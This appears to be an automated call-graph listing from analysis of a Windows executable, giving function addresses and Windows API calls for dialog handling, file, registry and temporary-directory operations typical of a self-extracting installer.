7ff75fbbbfb8 19661->19663 19662->19656 19664 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19663->19664 19664->19659 19665->19666 19666->19563 19668 7ff75fbbf91f 19667->19668 19669 7ff75fbbf91b 19667->19669 19668->19669 19670 7ff75fbbf939 GetStringTypeW 19668->19670 19669->19655 19670->19669 23177 7ff75fbc79a8 23178 7ff75fbc79c4 23177->23178 23179 7ff75fbc79ba 23177->23179 23181 7ff75fbbffc8 LeaveCriticalSection 23179->23181 23204 7ff75fbb29c7 23205 7ff75fbb29d3 23204->23205 23206 7ff75fbb3490 14 API calls 23205->23206 23206->23205 18852 7ff75fbb3766 18853 7ff75fbb3772 18852->18853 18854 7ff75fbb3490 14 API calls 18853->18854 18855 7ff75fbb37b1 18854->18855 18856 7ff75fbbc878 18863 7ff75fbbc580 18856->18863 18868 7ff75fbbe5c0 GetLastError 18863->18868 18867 7ff75fbbc58b 18888 7ff75fbbd958 18867->18888 18869 7ff75fbbe5e2 18868->18869 18870 7ff75fbbe5dd 18868->18870 18875 7ff75fbbe62b 18869->18875 18902 7ff75fbc05d4 18869->18902 18897 7ff75fbc0234 18870->18897 18874 7ff75fbbe601 18909 7ff75fbbda18 18874->18909 18877 7ff75fbbe630 SetLastError 18875->18877 18878 7ff75fbbe646 SetLastError 18875->18878 18877->18867 18881 7ff75fbbd958 abort 32 API calls 18878->18881 18884 7ff75fbbe653 18881->18884 18882 7ff75fbbe608 18882->18878 18883 7ff75fbbe61f 18920 7ff75fbbe36c 18883->18920 18980 7ff75fbc1a48 18888->18980 18925 7ff75fbbffe4 18897->18925 18900 7ff75fbc0276 TlsGetValue 18901 7ff75fbc0267 18900->18901 18901->18869 18907 7ff75fbc05e5 abort 18902->18907 18903 7ff75fbc0636 18938 7ff75fbbdedc 18903->18938 18904 7ff75fbc061a RtlAllocateHeap 18905 7ff75fbbe5f9 18904->18905 18904->18907 18905->18874 18915 7ff75fbc028c 18905->18915 18907->18903 18907->18904 18935 7ff75fbbc50c 18907->18935 18910 7ff75fbbda1d RtlRestoreThreadPreferredUILanguages 18909->18910 18914 7ff75fbbda4d __free_lconv_mon 18909->18914 18911 7ff75fbbda38 18910->18911 18910->18914 18912 7ff75fbbdedc memcpy_s 13 API calls 18911->18912 18913 7ff75fbbda3d GetLastError 18912->18913 18913->18914 18914->18882 18916 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 18915->18916 18917 7ff75fbc02bf 18916->18917 18918 7ff75fbc02d9 TlsSetValue 18917->18918 18919 7ff75fbbe618 18917->18919 18918->18919 18919->18874 18919->18883 18966 7ff75fbbe2ec 18920->18966 18926 7ff75fbc0040 18925->18926 18927 7ff75fbc0045 18925->18927 18926->18927 18928 7ff75fbc006d LoadLibraryW 18926->18928 18933 7ff75fbc00f2 18926->18933 18934 7ff75fbc00d7 FreeLibrary 18926->18934 18927->18900 18927->18901 18928->18926 18930 7ff75fbc008e GetLastError 18928->18930 18929 7ff75fbc0100 GetProcAddress 18931 7ff75fbc0111 18929->18931 18930->18926 18932 7ff75fbc0099 LoadLibraryExW 18930->18932 18931->18927 18932->18926 18933->18927 18933->18929 18934->18926 18941 7ff75fbbc54c 18935->18941 18947 7ff75fbbe654 GetLastError 18938->18947 18946 7ff75fbbff68 EnterCriticalSection 18941->18946 18948 7ff75fbbe67d 18947->18948 18949 7ff75fbbe678 18947->18949 18951 7ff75fbc05d4 abort 12 API calls 18948->18951 18953 7ff75fbbe6c6 18948->18953 18950 7ff75fbc0234 abort 6 API calls 18949->18950 18950->18948 18952 7ff75fbbe694 18951->18952 18954 7ff75fbbe69c 18952->18954 18957 7ff75fbc028c abort 6 API calls 18952->18957 18955 7ff75fbbe6d5 SetLastError 18953->18955 18956 7ff75fbbe6cb SetLastError 18953->18956 18959 7ff75fbbda18 __free_lconv_mon 12 API calls 18954->18959 18958 7ff75fbbdee5 18955->18958 18956->18958 18960 7ff75fbbe6b3 18957->18960 18958->18905 18961 7ff75fbbe6a3 18959->18961 18960->18954 18962 7ff75fbbe6ba 18960->18962 18961->18956 18963 7ff75fbbe36c abort 12 API calls 18962->18963 18964 7ff75fbbe6bf 18963->18964 18965 7ff75fbbda18 __free_lconv_mon 12 API calls 18964->18965 18965->18953 18978 7ff75fbbff68 EnterCriticalSection 18966->18978 19014 7ff75fbc1a00 18980->19014 19019 7ff75fbbff68 EnterCriticalSection 19014->19019 23266 7ff75fbbf590 23276 7ff75fbc43ec 23266->23276 23277 7ff75fbc43f8 23276->23277 23299 7ff75fbbff68 EnterCriticalSection 23277->23299 19051 7ff75fbb2318 19054 7ff75fba1c90 19051->19054 19055 7ff75fba1c98 SendDlgItemMessageW 19054->19055 19671 7ff75fbaf730 19672 7ff75fbaf759 _snwprintf 19671->19672 19829 7ff75fb913c0 19672->19829 19674 7ff75fbaf782 19675 7ff75fbaf7af 19674->19675 19676 7ff75fbaff4a 19674->19676 19677 7ff75fbaf79a 19674->19677 19919 7ff75fbb1b0c 19676->19919 19677->19675 19679 7ff75fbaf815 19677->19679 19680 7ff75fbaf7a6 19677->19680 19682 7ff75fbaf8b6 GetDlgItemTextW 19679->19682 19687 7ff75fbaf82f 19679->19687 19683 7ff75fbaf7f1 19680->19683 19684 7ff75fbaf7aa 19680->19684 19682->19683 19688 7ff75fbaf905 19682->19688 19683->19675 19695 7ff75fbaf8f7 EndDialog 19683->19695 19684->19675 19693 7ff75fb9fdf8 48 API calls 19684->19693 19685 7ff75fbaff7d 19689 7ff75fbaffa4 GetDlgItem IsDlgButtonChecked 19685->19689 19690 7ff75fbaff89 SendDlgItemMessageW 19685->19690 19686 7ff75fbaff6c IsDlgButtonChecked 19686->19685 19692 7ff75fb9fdf8 48 API calls 19687->19692 19694 7ff75fbaf91c GetDlgItem 19688->19694 19827 7ff75fbaf90e 19688->19827 19937 7ff75fbae27c GetCurrentDirectoryW 19689->19937 19690->19689 19699 7ff75fbaf84d SetDlgItemTextW 19692->19699 19700 7ff75fbaf7c0 19693->19700 19696 7ff75fbaf936 IsDlgButtonChecked IsDlgButtonChecked 19694->19696 19697 7ff75fbaf963 SetFocus 19694->19697 19695->19675 19696->19697 19701 7ff75fbaf975 19697->19701 19718 7ff75fbaf984 19697->19718 19698 7ff75fbaffdd GetDlgItem SetDlgItemTextW 19938 7ff75fbae8b0 GetClassNameW 19698->19938 19706 7ff75fbaf85b 19699->19706 19959 7ff75fb912bc SHGetMalloc 19700->19959 19704 7ff75fb9fdf8 48 API calls 19701->19704 19708 7ff75fbaf97f 19704->19708 19706->19675 19710 7ff75fbaf875 GetMessageW 19706->19710 19707 7ff75fbafe8d 19711 7ff75fb9fdf8 48 API calls 19707->19711 19837 7ff75fbb1890 19708->19837 19710->19675 19713 7ff75fbaf88f IsDialogMessageW 19710->19713 19714 7ff75fbafe9e SetDlgItemTextW 19711->19714 19713->19706 19717 7ff75fbaf8a0 TranslateMessage DispatchMessageW 19713->19717 19719 7ff75fb9fdf8 48 API calls 19714->19719 19715 7ff75fbb02d5 SetDlgItemTextW 19715->19675 19716 7ff75fbb006d 19723 7ff75fbb00a9 19716->19723 19726 7ff75fb9fdf8 48 API calls 19716->19726 19717->19706 19724 7ff75fb9fdf8 48 API calls 19718->19724 19750 7ff75fbafed0 19719->19750 19721 7ff75fbaf9d3 19725 7ff75fbaf9e8 19721->19725 19961 7ff75fbb2040 19721->19961 19722 7ff75fbb08e0 122 API calls 19722->19716 19728 7ff75fbb08e0 122 API calls 19723->19728 19766 7ff75fbb018f 19723->19766 19727 7ff75fbaf9ad 19724->19727 19847 7ff75fb9b1f0 19725->19847 19732 7ff75fbb0080 SetDlgItemTextW 19726->19732 19733 7ff75fb945d8 swprintf 46 API calls 19727->19733 19734 7ff75fbb00c8 19728->19734 19731 7ff75fbb024f 19736 7ff75fbb0263 19731->19736 19737 7ff75fbb0258 EnableWindow 19731->19737 19738 7ff75fb9fdf8 48 API calls 19732->19738 19733->19708 19745 7ff75fbb00dd 19734->19745 19771 7ff75fbb0109 19734->19771 19743 7ff75fbb028a 19736->19743 19990 7ff75fb91374 GetDlgItem EnableWindow 19736->19990 19737->19736 19744 7ff75fbb009b SetDlgItemTextW 19738->19744 19739 7ff75fbaff26 19742 7ff75fb9fdf8 48 API calls 19739->19742 19740 7ff75fbafa01 GetLastError 19741 7ff75fbafa12 19740->19741 19853 7ff75fbae91c SetCurrentDirectoryW 19741->19853 19742->19675 19749 7ff75fbb02b7 19743->19749 19755 7ff75fbb02af IsDlgButtonChecked 19743->19755 19744->19723 19975 7ff75fbad9d8 ShowWindow 19745->19975 19747 7ff75fbb0171 19751 7ff75fbb08e0 122 API calls 19747->19751 19749->19675 19758 7ff75fb9fdf8 48 API calls 19749->19758 19750->19739 19756 7ff75fb9fdf8 48 API calls 19750->19756 19751->19766 19753 7ff75fbafa1e 19759 7ff75fbafa25 GetLastError 19753->19759 19760 7ff75fbafa34 19753->19760 19755->19749 19764 7ff75fbaff09 19756->19764 19757 7ff75fbb00fd 19757->19771 19762 7ff75fbaf7d8 19758->19762 19759->19760 19763 7ff75fbafaa4 19760->19763 19769 7ff75fbafab3 19760->19769 19770 7ff75fbafa43 GetTickCount 19760->19770 19762->19675 19762->19715 19763->19769 19784 7ff75fbafd35 19763->19784 19767 7ff75fb945d8 swprintf 46 API calls 19764->19767 19765 7ff75fbb0228 19768 7ff75fbad9d8 37 API calls 19765->19768 19766->19731 19766->19765 19773 7ff75fb9fdf8 48 API calls 19766->19773 19767->19739 19768->19731 19774 7ff75fbafccc 19769->19774 19775 7ff75fbafcc3 19769->19775 19776 7ff75fbafac9 GetModuleFileNameW 19769->19776 19772 7ff75fb945d8 swprintf 46 API calls 19770->19772 19771->19747 19777 7ff75fbb08e0 122 API calls 19771->19777 19780 7ff75fbafa5f 19772->19780 19773->19766 19778 7ff75fb9fdf8 48 API calls 19774->19778 19775->19683 19775->19774 19965 7ff75fba0b1c 19776->19965 19781 7ff75fbb0140 19777->19781 19783 7ff75fbafcd6 19778->19783 19854 7ff75fb9a698 19780->19854 19781->19747 19782 7ff75fbb0149 DialogBoxParamW 19781->19782 19782->19747 19786 7ff75fb945d8 swprintf 46 API calls 19783->19786 19789 7ff75fb9fdf8 48 API calls 19784->19789 19788 7ff75fbafcfa 19786->19788 19787 7ff75fb945d8 swprintf 46 API calls 19791 7ff75fbafb1c CreateFileMappingW 19787->19791 19802 7ff75fb9fdf8 48 API calls 19788->19802 19793 7ff75fbafd63 SetDlgItemTextW 19789->19793 19792 7ff75fbafb9e GetCommandLineW 19791->19792 19819 7ff75fbafc3c memcpy_s 19791->19819 19795 7ff75fbafbb0 19792->19795 19796 7ff75fb91398 19793->19796 19794 7ff75fbafa82 19797 7ff75fbafa89 GetLastError 19794->19797 19798 7ff75fbafa98 19794->19798 19969 7ff75fbaf230 SHGetMalloc 19795->19969 19799 7ff75fbafd81 SetDlgItemTextW GetDlgItem 19796->19799 19797->19798 19862 7ff75fb9a5b0 19798->19862 19805 7ff75fbafdd2 19799->19805 19806 7ff75fbafdac GetWindowLongPtrW SetWindowLongPtrW 19799->19806 19804 7ff75fbafd12 19802->19804 19803 7ff75fbafbd6 19807 7ff75fbaf230 SHGetMalloc 19803->19807 19869 7ff75fbb08e0 19805->19869 19806->19805 19809 7ff75fbafbe7 19807->19809 19811 7ff75fbaf230 SHGetMalloc 19809->19811 19813 7ff75fbafbf8 19811->19813 19812 7ff75fbb08e0 122 API calls 19814 7ff75fbafdfc 19812->19814 19971 7ff75fba0d18 19813->19971 19908 7ff75fbb1f74 19814->19908 19815 7ff75fbafc9c 19815->19775 19822 7ff75fbafcb1 UnmapViewOfFile CloseHandle 19815->19822 19818 7ff75fbafc0f MapViewOfFile 19818->19819 19819->19815 19823 7ff75fbafc8a Sleep 19819->19823 19820 7ff75fbafe12 19821 7ff75fbb08e0 122 API calls 19820->19821 19826 7ff75fbafe2e 19821->19826 19822->19775 19823->19815 19823->19819 19824 7ff75fbafe5e 19918 7ff75fb91374 GetDlgItem EnableWindow 19824->19918 19826->19824 19828 7ff75fbb08e0 122 API calls 19826->19828 19827->19683 19827->19707 19828->19824 19830 7ff75fb91434 19829->19830 19831 7ff75fb913ce 19829->19831 19830->19674 19831->19830 19991 7ff75fb9fa1c 19831->19991 19833 7ff75fb913f3 19833->19830 19834 7ff75fb91408 GetDlgItem 19833->19834 19834->19830 19835 7ff75fb9141b 19834->19835 19835->19830 19836 7ff75fb91422 SetDlgItemTextW 19835->19836 19836->19830 19838 7ff75fbaf3c8 5 API calls 19837->19838 19839 7ff75fbb18b9 GetDlgItem 19838->19839 19840 7ff75fbb1925 IsDlgButtonChecked IsDlgButtonChecked 19839->19840 19841 7ff75fbb18d7 19839->19841 19842 7ff75fbb1986 IsDlgButtonChecked IsDlgButtonChecked IsDlgButtonChecked 19840->19842 19843 7ff75fbb196b 19840->19843 19846 7ff75fbb18e3 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 19841->19846 19844 7ff75fbb19f0 IsDlgButtonChecked 19842->19844 19845 7ff75fbb19cb IsDlgButtonChecked 19842->19845 19843->19842 19844->19721 19845->19844 19846->19840 19848 7ff75fb9b20e _snwprintf 19847->19848 19849 7ff75fb9b2c1 19848->19849 19850 7ff75fb9b29b 19848->19850 20024 7ff75fb9b438 19848->20024 19849->19740 19849->19741 19850->19849 19851 7ff75fb9b438 8 API calls 19850->19851 19851->19849 19853->19753 19855 7ff75fb9a6b7 _snwprintf 19854->19855 19856 7ff75fb9a706 CreateFileW 19855->19856 19857 7ff75fb9a700 19855->19857 19856->19857 19858 7ff75fb9a77f 19857->19858 19859 7ff75fb9cbcc GetCurrentDirectoryW 19857->19859 19858->19794 19860 7ff75fb9a74d 19859->19860 19860->19858 19861 7ff75fb9a751 CreateFileW 19860->19861 19861->19858 19863 7ff75fb9a5c5 19862->19863 19864 7ff75fb9a5d6 19862->19864 19863->19864 19865 7ff75fb9a5d1 19863->19865 19866 7ff75fb9a5d8 19863->19866 19864->19763 20059 7ff75fb9a7c0 19865->20059 20068 7ff75fb9a630 19866->20068 19870 7ff75fbb08e9 _snwprintf 19869->19870 19871 7ff75fbafde7 19869->19871 20144 7ff75fbaf118 19870->20144 19871->19812 19873 7ff75fba3d70 CompareStringW 19906 7ff75fbb0951 wcscat 19873->19906 19874 7ff75fbb10e0 GetTempPathW 19874->19906 19875 7ff75fbaf118 ExpandEnvironmentStringsW 19875->19906 19876 7ff75fbaf2ac 74 API calls 19876->19906 19879 7ff75fbb0dd7 SetDlgItemTextW 19879->19906 19880 7ff75fbbc4d8 43 API calls 19880->19906 19881 7ff75fb945d8 swprintf 46 API calls 19881->19906 19883 7ff75fbb114d SetDlgItemTextW 19883->19906 19885 7ff75fbb0c2a RegOpenKeyExW 19886 7ff75fbb0c55 RegQueryValueExW RegCloseKey 19885->19886 19885->19906 19886->19906 19887 7ff75fbb0f4b SetFileAttributesW 19889 7ff75fbb1015 GetFileAttributesW 19887->19889 19905 7ff75fbb0b06 memcpy_s 19887->19905 19890 7ff75fbb1026 DeleteFileW 19889->19890 19889->19905 19890->19905 19892 7ff75fb9b7e8 6 API calls 19892->19905 19893 7ff75fb9c66c GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 19893->19906 19894 7ff75fb9b3ac GetFileAttributesW GetFileAttributesW GetCurrentDirectoryW 19894->19906 19895 7ff75fb945d8 swprintf 46 API calls 19897 7ff75fbb1064 GetFileAttributesW 19895->19897 19896 7ff75fbaf230 SHGetMalloc 19896->19906 19900 7ff75fbb1075 MoveFileW 19897->19900 19897->19905 19898 7ff75fbb123f EndDialog 19898->19906 19903 7ff75fbb108d MoveFileExW 19900->19903 19900->19905 19902 7ff75fb9b3c0 3 API calls 19902->19906 19903->19905 19904 7ff75fbb0db4 IsDlgButtonChecked 19904->19906 19905->19887 19905->19889 19905->19892 19905->19895 19905->19906 20160 7ff75fb9c9d0 19905->20160 20167 7ff75fbb1c4c 19905->20167 19906->19871 19906->19873 19906->19874 19906->19875 19906->19876 19906->19879 19906->19880 19906->19881 19906->19883 19906->19885 19906->19893 19906->19894 19906->19896 19906->19898 19906->19902 19906->19904 19906->19905 19907 7ff75fb9b1f0 8 API calls 19906->19907 20148 7ff75fbaef38 19906->20148 20155 7ff75fbae27c GetCurrentDirectoryW 19906->20155 20156 7ff75fb9b7e8 19906->20156 20164 7ff75fb9b754 19906->20164 20187 7ff75fbbc0dc 19906->20187 19907->19906 19909 7ff75fbb1f84 _snwprintf wcscpy 19908->19909 20222 7ff75fba20e8 19909->20222 19911 7ff75fbb1fb0 wcscpy 20226 7ff75fb96028 19911->20226 19913 7ff75fbb1fce 20230 7ff75fb988b8 19913->20230 19917 7ff75fbb2027 19917->19820 19920 7ff75fbb1b2b _snwprintf 19919->19920 21451 7ff75fbae1dc 19920->21451 19923 7ff75fbaff52 19923->19685 19923->19686 19924 7ff75fbb1b3e GetWindow 19930 7ff75fbb1b59 19924->19930 19925 7ff75fbb1b65 GetClassNameW 21456 7ff75fba3d70 CompareStringW 19925->21456 19927 7ff75fbb1c0d GetWindow 19927->19923 19927->19930 19928 7ff75fbb1b8e GetWindowLongPtrW 19928->19927 19929 7ff75fbb1ba0 IsDlgButtonChecked 19928->19929 19929->19927 19931 7ff75fbb1bbc GetObjectW 19929->19931 19930->19923 19930->19925 19930->19927 19930->19928 21457 7ff75fbae244 19931->21457 19933 7ff75fbb1bd8 21461 7ff75fbae20c 19933->21461 21465 7ff75fbae4cc 19933->21465 19936 7ff75fbb1bf0 IsDlgButtonChecked DeleteObject 19936->19927 19937->19698 19939 7ff75fbae8d1 19938->19939 19940 7ff75fbae8fe 19938->19940 21483 7ff75fba3d70 CompareStringW 19939->21483 19942 7ff75fbae911 19940->19942 19943 7ff75fbae903 SHAutoComplete 19940->19943 19946 7ff75fbaee20 19942->19946 19943->19942 19944 7ff75fbae8e2 19944->19940 19945 7ff75fbae8e6 FindWindowExW 19944->19945 19945->19940 19947 7ff75fbaee3e _snwprintf 19946->19947 19948 7ff75fb914f8 6 API calls 19947->19948 19949 7ff75fbaee56 19948->19949 21484 7ff75fb921e4 19949->21484 19952 7ff75fbaee71 19954 7ff75fb9173c 88 API calls 19952->19954 19953 7ff75fbaee82 19955 7ff75fb91b18 129 API calls 19953->19955 19956 7ff75fbaee7b 19954->19956 19957 7ff75fbaeeaa memcpy_s 19955->19957 19956->19716 19956->19722 19958 7ff75fb9173c 88 API calls 19957->19958 19958->19956 19960 7ff75fb912e6 19959->19960 19960->19762 19963 7ff75fbb2050 _snwprintf 19961->19963 19962 7ff75fbb2112 19962->19725 19963->19962 19964 7ff75fbb2104 RegCloseKey 19963->19964 19964->19962 19966 7ff75fba0b56 19965->19966 19967 7ff75fba0b3d 19965->19967 19966->19787 21491 7ff75fba0b70 19967->21491 19970 7ff75fbaf264 19969->19970 19970->19803 19972 7ff75fba0d44 19971->19972 19973 7ff75fba0d2e memcpy_s 19971->19973 19974 7ff75fba0b70 80 API calls 19972->19974 19973->19818 19974->19973 19976 7ff75fbada1c 19975->19976 19977 7ff75fbada2f 19976->19977 19978 7ff75fbbc0dc 31 API calls 19976->19978 19979 7ff75fbada4c 19977->19979 19981 7ff75fbbc0dc 31 API calls 19977->19981 19978->19977 19980 7ff75fbada55 GetWindowRect 19979->19980 19982 7ff75fbada70 19980->19982 19981->19980 19983 7ff75fbadb4f 19982->19983 19986 7ff75fbadb06 19982->19986 19984 7ff75fbadb4d 19983->19984 19985 7ff75fbadb54 ShowWindow 19983->19985 19984->19757 19985->19984 19986->19984 21511 7ff75fbad7c0 19986->21511 19989 7ff75fbadb2b ShowWindow SetDlgItemTextW 19989->19984 19992 7ff75fb945d8 swprintf 46 API calls 19991->19992 19993 7ff75fb9fa67 19992->19993 19994 7ff75fba3b98 WideCharToMultiByte 19993->19994 19996 7ff75fb9fa77 19994->19996 19995 7ff75fb9fae7 20014 7ff75fb9eca8 19995->20014 19996->19995 20008 7ff75fb9ef3c 31 API calls 19996->20008 20011 7ff75fb9fac8 SetDlgItemTextW 19996->20011 19998 7ff75fb9fafc GetWindowRect GetClientRect 19999 7ff75fb9fc54 GetSystemMetrics GetWindow 19998->19999 20000 7ff75fb9fb63 19998->20000 20003 7ff75fb9fd83 19999->20003 20012 7ff75fb9fc7f 19999->20012 20001 7ff75fb9fc24 20000->20001 20002 7ff75fb9fb6c GetWindowLongPtrW 20000->20002 20017 7ff75fb9ed48 20001->20017 20004 7ff75fc012b0 20002->20004 20003->19833 20006 7ff75fb9fc0a GetWindowRect 20004->20006 20006->20001 20008->19996 20009 7ff75fb9fca0 GetWindowRect 20009->20012 20010 7ff75fb9fc47 SetDlgItemTextW 20010->19999 20011->19996 20012->20003 20012->20009 20013 7ff75fb9fd62 GetWindow 20012->20013 20013->20003 20013->20012 20015 7ff75fb9ed48 47 API calls 20014->20015 20016 7ff75fb9ece0 20015->20016 20016->19998 20018 7ff75fb945d8 swprintf 46 API calls 20017->20018 20019 7ff75fb9ed7c 20018->20019 20020 7ff75fba3b98 WideCharToMultiByte 20019->20020 20021 7ff75fb9ed94 20020->20021 20022 7ff75fb9ef3c 31 API calls 20021->20022 20023 7ff75fb9edac 20022->20023 20023->19999 20023->20010 20025 7ff75fb9b452 _snwprintf 20024->20025 20026 7ff75fb9b480 20025->20026 20027 7ff75fb9b471 CreateDirectoryW 20025->20027 20037 7ff75fb9b3c0 20026->20037 20027->20026 20030 7ff75fb9b4b5 20027->20030 20034 7ff75fb9b4c4 20030->20034 20045 7ff75fb9b6d0 20030->20045 20031 7ff75fb9b4c8 GetLastError 20031->20034 20034->19848 20035 7ff75fb9b4a0 20035->20031 20036 7ff75fb9b4a4 CreateDirectoryW 20035->20036 20036->20030 20036->20031 20057 7ff75fbb3900 20037->20057 20040 7ff75fb9b3e3 20042 7ff75fb9cbcc GetCurrentDirectoryW 20040->20042 20041 7ff75fb9b407 20041->20031 20053 7ff75fb9cbcc 20041->20053 20043 7ff75fb9b3f6 20042->20043 20043->20041 20044 7ff75fb9b3fa GetFileAttributesW 20043->20044 20044->20041 20046 7ff75fbb3900 _snwprintf 20045->20046 20047 7ff75fb9b6e5 SetFileAttributesW 20046->20047 20048 7ff75fb9b725 20047->20048 20049 7ff75fb9b6fc 20047->20049 20048->20034 20050 7ff75fb9cbcc GetCurrentDirectoryW 20049->20050 20051 7ff75fb9b70f 20050->20051 20051->20048 20052 7ff75fb9b713 SetFileAttributesW 20051->20052 20052->20048 20054 7ff75fb9cbeb _snwprintf 20053->20054 20055 7ff75fb9ccb0 GetCurrentDirectoryW 20054->20055 20056 7ff75fb9cc24 20054->20056 20055->20056 20056->20035 20058 7ff75fb9b3d0 GetFileAttributesW 20057->20058 20058->20040 20058->20041 20060 7ff75fb9a7f7 20059->20060 20061 7ff75fb9a7cf _snwprintf 20059->20061 20060->19864 20061->20060 20062 7ff75fb9b35c DeleteFileW 20061->20062 20063 7ff75fb9b371 20062->20063 20064 7ff75fb9b398 20062->20064 20065 7ff75fb9cbcc GetCurrentDirectoryW 20063->20065 20064->19864 20066 7ff75fb9b384 20065->20066 20066->20064 20067 7ff75fb9b388 DeleteFileW 20066->20067 20067->20064 20069 7ff75fb9a664 20068->20069 20070 7ff75fb9a64c 20068->20070 20071 7ff75fb9a688 20069->20071 20074 7ff75fb975e8 20069->20074 20070->20069 20072 7ff75fb9a658 FindCloseChangeNotification 20070->20072 20071->19864 20072->20069 20075 7ff75fb975f7 20074->20075 20076 7ff75fb97609 20074->20076 20080 7ff75fb9144c 20075->20080 20076->20071 20081 7ff75fb91491 memcpy_s 20080->20081 20089 7ff75fba3334 20081->20089 20083 7ff75fb914ba 20084 7ff75fb978cc 20083->20084 20141 7ff75fb976cc GetLastError 20084->20141 20086 7ff75fb9795e 20086->20076 20087 7ff75fb9144c 71 API calls 20088 7ff75fb978f8 20087->20088 20088->20086 20088->20087 20090 7ff75fba3340 _snwprintf 20089->20090 20091 7ff75fba3352 20090->20091 20093 7ff75fba361b 20090->20093 20094 7ff75fba3361 20091->20094 20116 7ff75fba34d3 20091->20116 20092 7ff75fba348d 20092->20083 20093->20092 20097 7ff75fba3652 20093->20097 20098 7ff75fba3631 20093->20098 20095 7ff75fba34a6 20094->20095 20096 7ff75fba342c 20094->20096 20121 7ff75fba3370 20094->20121 20099 7ff75fb9fdf8 48 API calls 20095->20099 20096->20095 20105 7ff75fba343f 20096->20105 20112 7ff75fba33ad 20096->20112 20100 7ff75fb9fdf8 48 API calls 20097->20100 20101 7ff75fb9fdf8 48 API calls 20098->20101 20108 7ff75fba33de 20099->20108 20106 7ff75fba3650 20100->20106 20102 7ff75fba363b 20101->20102 20103 7ff75fb945d8 swprintf 46 API calls 20102->20103 20103->20106 20104 7ff75fb9fdf8 48 API calls 20104->20108 20111 7ff75fba3470 20105->20111 20105->20112 20107 7ff75fb9fdf8 48 API calls 20106->20107 20107->20092 20109 7ff75fbaf723 20108->20109 20110 7ff75fbaf6b6 GetLastError 20108->20110 20109->20083 20114 7ff75fbaf6c8 _snwprintf 20110->20114 20115 7ff75fb9fdf8 48 API calls 20111->20115 20112->20092 20112->20104 20113 7ff75fb9fdf8 48 API calls 20113->20116 20119 7ff75fbba818 swprintf 46 API calls 20114->20119 20117 7ff75fba347a 20115->20117 20116->20092 20116->20113 20118 7ff75fb945d8 swprintf 46 API calls 20116->20118 20127 7ff75fbaf690 20117->20127 20118->20116 20122 7ff75fbaf6ec 20119->20122 20121->20092 20121->20108 20121->20112 20123 7ff75fb9fdf8 48 API calls 20121->20123 20137 7ff75fbaec00 20122->20137 20123->20112 20126 7ff75fbaf703 SetLastError 20126->20109 20128 7ff75fbaf6b1 20127->20128 20129 7ff75fbaf723 20127->20129 20128->20129 20130 7ff75fbaf6b6 GetLastError 20128->20130 20129->20092 20131 7ff75fbaf6c8 _snwprintf 20130->20131 20132 7ff75fbba818 swprintf 46 API calls 20131->20132 20133 7ff75fbaf6ec 20132->20133 20134 7ff75fbaec00 16 API calls 20133->20134 20135 7ff75fbaf6ff 20134->20135 20135->20129 20136 7ff75fbaf703 SetLastError 20135->20136 20136->20129 20139 7ff75fbaec1d _snwprintf 20137->20139 20138 7ff75fbaec4e 20138->20109 20138->20126 20139->20138 20140 7ff75fbb1890 16 API calls 20139->20140 20140->20138 20142 7ff75fb97712 20141->20142 20143 7ff75fb976e6 FormatMessageW 20141->20143 20142->20088 20143->20142 20145 7ff75fbaf137 _snwprintf 20144->20145 20146 7ff75fbaf1e3 ExpandEnvironmentStringsW 20145->20146 20147 7ff75fbaf207 20145->20147 20146->20147 20147->19906 20150 7ff75fbaef52 _snwprintf 20148->20150 20149 7ff75fbaf01f GetDlgItem SetDlgItemTextW IsDlgButtonChecked 20149->19906 20150->20149 20151 7ff75fbaef7c RegOpenKeyExW 20150->20151 20151->20149 20152 7ff75fbaefa5 RegQueryValueExW 20151->20152 20153 7ff75fbaefe5 20152->20153 20154 7ff75fbaf014 RegCloseKey 20152->20154 20153->20154 20154->20149 20155->19906 20159 7ff75fb9b80e 20156->20159 20157 7ff75fb9b8b6 20157->19906 20158 7ff75fb9b8f8 6 API calls 20158->20159 20159->20157 20159->20158 20161 7ff75fb9c9fe 20160->20161 20162 7ff75fb945d8 swprintf 46 API calls 20161->20162 20163 7ff75fb9ca1a 20161->20163 20162->20163 20163->19905 20165 7ff75fb9b765 FindClose 20164->20165 20166 7ff75fb9b76b 20164->20166 20165->20166 20166->19906 20170 7ff75fbb1c71 memcpy_s _snwprintf 20167->20170 20168 7ff75fbb1ed6 20168->19905 20169 7ff75fbb1d8c 20195 7ff75fb9b3ac 20169->20195 20170->20168 20170->20169 20194 7ff75fba3d70 CompareStringW 20170->20194 20175 7ff75fbb1e18 20206 7ff75fbb2190 20175->20206 20176 7ff75fbb1e73 CloseHandle 20178 7ff75fbb1e82 20176->20178 20179 7ff75fbb1e91 20176->20179 20177 7ff75fbb1dc2 20177->20168 20177->20175 20177->20176 20181 7ff75fbb1e0a ShowWindow 20177->20181 20212 7ff75fba3d70 CompareStringW 20178->20212 20179->20168 20184 7ff75fbb1ec8 ShowWindow 20179->20184 20181->20175 20184->20168 20185 7ff75fbb1e3e GetExitCodeProcess 20185->20176 20186 7ff75fbb1e53 20185->20186 20186->20176 20188 7ff75fbbc111 20187->20188 20191 7ff75fbbc0fa 20187->20191 20188->20191 20213 7ff75fbbfa84 20188->20213 20191->19906 20192 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 20193 7ff75fbbc15d 20192->20193 20194->20169 20196 7ff75fb9b3c0 3 API calls 20195->20196 20197 7ff75fb9b3b5 20196->20197 20197->20177 20198 7ff75fb9c66c 20197->20198 20199 7ff75fb9c684 _snwprintf 20198->20199 20200 7ff75fb9c6a6 GetFullPathNameW 20199->20200 20201 7ff75fb9c707 20199->20201 20200->20201 20202 7ff75fb9c6cb 20200->20202 20201->20177 20203 7ff75fb9cbcc GetCurrentDirectoryW 20202->20203 20204 7ff75fb9c6e1 20203->20204 20204->20201 20205 7ff75fb9c6e5 GetFullPathNameW 20204->20205 20205->20201 20207 7ff75fbb21e3 WaitForSingleObject 20206->20207 20208 7ff75fbb1e30 20207->20208 20209 7ff75fbb219b PeekMessageW 20207->20209 20208->20176 20208->20185 20210 7ff75fbb21e0 20209->20210 20211 7ff75fbb21b7 GetMessageW TranslateMessage DispatchMessageW 20209->20211 20210->20207 20211->20210 20212->20179 20214 7ff75fbbfa91 20213->20214 20215 7ff75fbbfa9b 20213->20215 20214->20215 20218 7ff75fbbfab7 20214->20218 20216 7ff75fbbdedc memcpy_s 15 API calls 20215->20216 20221 7ff75fbbfaa3 20216->20221 20217 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 20219 